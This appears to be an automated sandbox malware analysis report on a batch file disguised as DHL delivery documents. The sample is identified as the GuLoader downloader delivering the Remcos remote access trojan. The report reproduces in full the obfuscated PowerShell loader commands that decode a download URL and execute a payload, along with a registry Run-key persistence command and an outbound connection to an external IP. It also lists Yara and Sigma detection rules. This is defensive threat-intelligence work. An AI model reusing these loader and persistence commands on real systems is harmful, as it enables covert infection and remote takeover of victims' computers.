Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
awb_post_dhl_delivery_documents_07_03_2025_000000000000000.bat

Overview

General Information

Sample name:awb_post_dhl_delivery_documents_07_03_2025_000000000000000.bat
Analysis ID:1632026
MD5:edaf8ad7fe020745bceed3c4baad35b3
SHA1:2f1242d44c9b11fbe8b20e8023cbcfacbb6b044f
SHA256:45568e9d3eb6f833b3b36b9061d04f94f342f05a2c8fe4f8839b38e5633b9230
Tags:batDHLuser-abuse_ch
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Suspicious powershell command line found
Uses dynamic DNS services
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7252 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\awb_post_dhl_delivery_documents_07_03_2025_000000000000000.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7304 cmdline: powershell.exe -windowstyle hidden "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOrganyK,nge.UnproHFreelePantaaparasdBritaeNerirrUopfosSl to[B,llf$Eme,rTPr duaWie.ewnadka]Trave=Besty$ Sta HNyerho ChacrKoreoeA.oindo.thoe');$Fritnkeris=Slappelse199 'Afgrs$StavnRCyprieHaandv nlumiFejlksMohocoGoelirD.vleyE,eut.UnikuD MeldoCer.iw Ca un ksplBeda.ouns aahyp rdTolv F AndriCemenlFormueTunes( diak$BagudAMe,nukSo.tbt NoncrSkrmbieuropcBehoveForudn PrepsPriva,Duge $BalkaBHaan,eB.kseh riseJeronlNonvidRamar)';$Beheld=$Plumbums;Haggardly (Slappelse199 ' Ra z$Bred,GPancrLDuu vovge nb NecrADea oLGuiro:CigarHRuskrO resL LyceeUgelnt TnucHPrimanDiploiMetalCUnfle= Fjer(De.eitLoselE ap.eSOversTRests-Perc ppermiaOmlastKaffehVioli Perso$ SoftbUdvanePhysiHO dreeRosmaLIri rdCrims)');while (!$Holethnic) {Haggardly (Slappelse199 'Udsky$LatrigFrontlVejtroBarmsbApp.aaDeltrlPortv:R.kurmU.preiFunkts EdnrwQatarrJuguliSautetforw,emisen=Tsemi$BrandS SubstDrnlerOutblmDesenpU,drae Go.sfhf etdPattodM,thoeSiccer FarvnSkryde') ;Haggardly $Fritnkeris;Haggardly (Slappelse199 '.jlsa[CephaTGangrHPantorBestiENeskhASuperdUnmasIVaaben RimagMabeo.JagenTFlaskHRejseRDjvleERtes.AProdudK.nte]afsla:Blted:Get wSUnderLSh,ntEExceneP rilpKunst(Ef.er4Hallc0Stenb0Kujon0 nwit)');Haggardly (Slappelse199 'Ramus$Und cGskandlPsychoBrostBUdenrAKo celSourb: hel hPeroroRespoLAan sE MarmTBesj.H UdsknPul oIBlgetcPakpr=Lintw(Kugelt TilsEI tersIslndTVente-klausPBiss aRubiaTUnscrh rot mili.$ThermbLoselEPrelaHSabicESportLPapegdDreed)') ;Haggardly (Slappelse199 'Skvat$fa ligDigtelWahhaOF jlsBM ljbARheumLResus:SaddeRHel oESolfaD VideRskruteBetersmedioSNaglee aaskrLetteI Monon eterg SlukS Svrd= Jud $tantrGCruncLredniO SquiBAfslaA Storl S bc:Dus oD Old aLagerL amaECo reTtr nbHEmbaysSmugl+Sk.re+ Haar%Start$Yeas sRol beScopiRUdtmtv mciniUn.lbcUd,ifEraggeP La.kR IndkIQuipssAzot,ExanthrFacitN FuseE Aka.sNomin.Pre ic KorsO,ootyuAsyllNPanchT') ;$Aktricens=$Serviceprisernes[$Redresserings]}$Hedvinene143=304093;$Mouldings=32673;Haggardly (Slappelse199 'Tykst$Exoerg NevaL Rusto iogabBes.ea Polel Resp:.osegeCompafMonocT BlueeDiscorF queBKo derElskoNBandiD NodeI ProlN RuthGOx.chE.rossnS.ive Pre e=Lan.e DrttegC amoe entvTNupti-RacencRustboPostdn sa aTK rkeeFredsNVandrt utun Penul$unforbUndese CaveHFarveeHonniltolypd');Haggardly (Slappelse199 'Barb $,ndlagKlad lEner o appebMatriahullalMater:LandbF,agloiDefunnBekrfhLileseAngordClibaear dur Sa.cnPharyeC.nsu Icht =D lir Succi[SprriSSolaryprot sAnfeetEtatseTa samResed.KometCchrysoo erwnpeitev HoiceLil erDekodtUrosc]A sci:Udsty: elcFGripprQuailoLa.temBilleBRowa aUgemas MisbeEpigr6Podia4ReaffS.repet Menir.iureiJocosnUndergProan(Z nin$DokmaETjrm fOmn vtExtraeSolmorStangb fre.rfl tsnDors dPro aiInspin PotwgFalane DribnHooey)');Haggardly (Slappelse199 'Le,va$ App GWaf ilSemi,O TranbBimilAN nsel Re i:MegohrMilieeLo deKDolmeuSchmaR LatiSmodemE PlatR.lagnNFjerneforepsT.ilo Baand= Fros St re[a fons Ju iY TrelSLydbaTSlideeSwellmLanga.ClearTpu dlE angexLoeinTSag r.A.etre SpirN .ortcGym rOLivsmdSt rsiTvangN OuveGLitre]Steto:Arkit:PeramaSvanfsdy,ekCInadaiNeuroiFlles.UnshoGOr,hieDrvtyt SateS,ephaTDisklrr.nskiR painVi ilGantip(Prale$EudaeFtapasiTo,nenFissih,eleieThereD,kureEDuettReng,nNHypodEInor )');Haggardly (Slappelse199 ' Rust$AppargNonshl,eomeORdmenbUdf,iA aluLDybs.:DevenTUgrssOLftedT efugeNonreMTayiriSignesStachTLeucosAstel=Frste$EarloR Natuem norKUforsUB.estRParads MinkETegnir.ntennSw,ngeRevolSSt ve.Da elS hostUMenisb optis DotttFro sRAnkl,iH.lvsNPhocog An.t( Smrr$Airmoh RkneETripidOrdboVUnfl,iR.ilrnBankyeFilann rnsvE Daug1 H.li4Demi.3antar,A gum$ ersoMTubenoSnittuAmin,LNuppedPinnuI paltN oquiGAnskuS pant)');Haggardly $totemists;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8052 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOrganyK,nge.UnproHFreelePantaaparasdBritaeNerirrUopfosSl to[B,llf$Eme,rTPr duaWie.ewnadka]Trave=Besty$ Sta HNyerho ChacrKoreoeA.oindo.thoe');$Fritnkeris=Slappelse199 'Afgrs$StavnRCyprieHaandv nlumiFejlksMohocoGoelirD.vleyE,eut.UnikuD MeldoCer.iw Ca un ksplBeda.ouns aahyp rdTolv F AndriCemenlFormueTunes( diak$BagudAMe,nukSo.tbt NoncrSkrmbieuropcBehoveForudn PrepsPriva,Duge $BalkaBHaan,eB.kseh riseJeronlNonvidRamar)';$Beheld=$Plumbums;Haggardly (Slappelse199 ' Ra z$Bred,GPancrLDuu vovge nb NecrADea oLGuiro:CigarHRuskrO resL LyceeUgelnt TnucHPrimanDiploiMetalCUnfle= Fjer(De.eitLoselE ap.eSOversTRests-Perc ppermiaOmlastKaffehVioli Perso$ SoftbUdvanePhysiHO dreeRosmaLIri rdCrims)');while (!$Holethnic) {Haggardly (Slappelse199 'Udsky$LatrigFrontlVejtroBarmsbApp.aaDeltrlPortv:R.kurmU.preiFunkts EdnrwQatarrJuguliSautetforw,emisen=Tsemi$BrandS SubstDrnlerOutblmDesenpU,drae Go.sfhf etdPattodM,thoeSiccer FarvnSkryde') ;Haggardly $Fritnkeris;Haggardly (Slappelse199 '.jlsa[CephaTGangrHPantorBestiENeskhASuperdUnmasIVaaben RimagMabeo.JagenTFlaskHRejseRDjvleERtes.AProdudK.nte]afsla:Blted:Get wSUnderLSh,ntEExceneP rilpKunst(Ef.er4Hallc0Stenb0Kujon0 nwit)');Haggardly (Slappelse199 'Ramus$Und cGskandlPsychoBrostBUdenrAKo celSourb: hel hPeroroRespoLAan sE MarmTBesj.H UdsknPul oIBlgetcPakpr=Lintw(Kugelt TilsEI tersIslndTVente-klausPBiss aRubiaTUnscrh rot mili.$ThermbLoselEPrelaHSabicESportLPapegdDreed)') ;Haggardly (Slappelse199 'Skvat$fa ligDigtelWahhaOF jlsBM ljbARheumLResus:SaddeRHel oESolfaD VideRskruteBetersmedioSNaglee aaskrLetteI Monon eterg SlukS Svrd= Jud $tantrGCruncLredniO SquiBAfslaA Storl S bc:Dus oD Old aLagerL amaECo reTtr nbHEmbaysSmugl+Sk.re+ Haar%Start$Yeas sRol beScopiRUdtmtv mciniUn.lbcUd,ifEraggeP La.kR IndkIQuipssAzot,ExanthrFacitN FuseE Aka.sNomin.Pre ic KorsO,ootyuAsyllNPanchT') ;$Aktricens=$Serviceprisernes[$Redresserings]}$Hedvinene143=304093;$Mouldings=32673;Haggardly (Slappelse199 'Tykst$Exoerg NevaL Rusto iogabBes.ea Polel Resp:.osegeCompafMonocT BlueeDiscorF queBKo derElskoNBandiD NodeI ProlN RuthGOx.chE.rossnS.ive Pre e=Lan.e DrttegC amoe entvTNupti-RacencRustboPostdn sa aTK rkeeFredsNVandrt utun Penul$unforbUndese CaveHFarveeHonniltolypd');Haggardly (Slappelse199 'Barb $,ndlagKlad lEner o appebMatriahullalMater:LandbF,agloiDefunnBekrfhLileseAngordClibaear dur Sa.cnPharyeC.nsu Icht =D lir Succi[SprriSSolaryprot sAnfeetEtatseTa samResed.KometCchrysoo erwnpeitev HoiceLil erDekodtUrosc]A sci:Udsty: elcFGripprQuailoLa.temBilleBRowa aUgemas MisbeEpigr6Podia4ReaffS.repet Menir.iureiJocosnUndergProan(Z nin$DokmaETjrm fOmn vtExtraeSolmorStangb fre.rfl tsnDors dPro aiInspin PotwgFalane DribnHooey)');Haggardly (Slappelse199 'Le,va$ App GWaf ilSemi,O TranbBimilAN nsel Re i:MegohrMilieeLo deKDolmeuSchmaR LatiSmodemE PlatR.lagnNFjerneforepsT.ilo Baand= Fros St re[a fons Ju iY TrelSLydbaTSlideeSwellmLanga.ClearTpu dlE angexLoeinTSag r.A.etre SpirN .ortcGym rOLivsmdSt rsiTvangN OuveGLitre]Steto:Arkit:PeramaSvanfsdy,ekCInadaiNeuroiFlles.UnshoGOr,hieDrvtyt SateS,ephaTDisklrr.nskiR painVi ilGantip(Prale$EudaeFtapasiTo,nenFissih,eleieThereD,kureEDuettReng,nNHypodEInor )');Haggardly (Slappelse199 ' Rust$AppargNonshl,eomeORdmenbUdf,iA aluLDybs.:DevenTUgrssOLftedT efugeNonreMTayiriSignesStachTLeucosAstel=Frste$EarloR Natuem norKUforsUB.estRParads MinkETegnir.ntennSw,ngeRevolSSt ve.Da elS hostUMenisb optis DotttFro sRAnkl,iH.lvsNPhocog An.t( Smrr$Airmoh RkneETripidOrdboVUnfl,iR.ilrnBankyeFilann rnsvE Daug1 H.li4Demi.3antar,A gum$ ersoMTubenoSnittuAmin,LNuppedPinnuI paltN oquiGAnskuS pant)');Haggardly $totemists;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7256 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 7324 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 1372 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\hsGaonspt.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000E.00000002.2499274880.00000000054F3000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        0000000A.00000002.1988703799.000000000A323000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 7304JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: powershell.exe PID: 7304INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x2a18f4:$b2: ::FromBase64String(
            • 0xe9a18:$s1: -join
            • 0x156059:$s1: -join
            • 0x16312e:$s1: -join
            • 0x166500:$s1: -join
            • 0x166bb2:$s1: -join
            • 0x1686a3:$s1: -join
            • 0x16a8a9:$s1: -join
            • 0x16b0d0:$s1: -join
            • 0x16b940:$s1: -join
            • 0x16c07b:$s1: -join
            • 0x16c0ad:$s1: -join
            • 0x16c0f5:$s1: -join
            • 0x16c114:$s1: -join
            • 0x16c964:$s1: -join
            • 0x16cae0:$s1: -join
            • 0x16cb58:$s1: -join
            • 0x16cbeb:$s1: -join
            • 0x16ce51:$s1: -join
            • 0x16efe7:$s1: -join
            • 0x17da31:$s1: -join
            Click to see the 3 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7304.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_8052.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xa998:$b2: ::FromBase64String(
              • 0x9a5a:$s1: -join
              • 0x3206:$s4: +=
              • 0x32c8:$s4: +=
              • 0x74ef:$s4: +=
              • 0x960c:$s4: +=
              • 0x98f6:$s4: +=
              • 0x9a3c:$s4: +=
              • 0x1430c:$s4: +=
              • 0x1438c:$s4: +=
              • 0x14452:$s4: +=
              • 0x144d2:$s4: +=
              • 0x146a8:$s4: +=
              • 0x1472c:$s4: +=
              • 0xa23e:$e4: Get-WmiObject
              • 0xa42d:$e4: Get-Process
              • 0xa485:$e4: Start-Process
              • 0x14f8d:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1372, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Afbenyt
              Sigma detected: Direct Autorun Keys Modification
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7324, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)", ProcessId: 1372, ProcessName: reg.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 27.124.114.163, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7256, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49721
              Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7256, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)", ProcessId: 7324, ProcessName: cmd.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
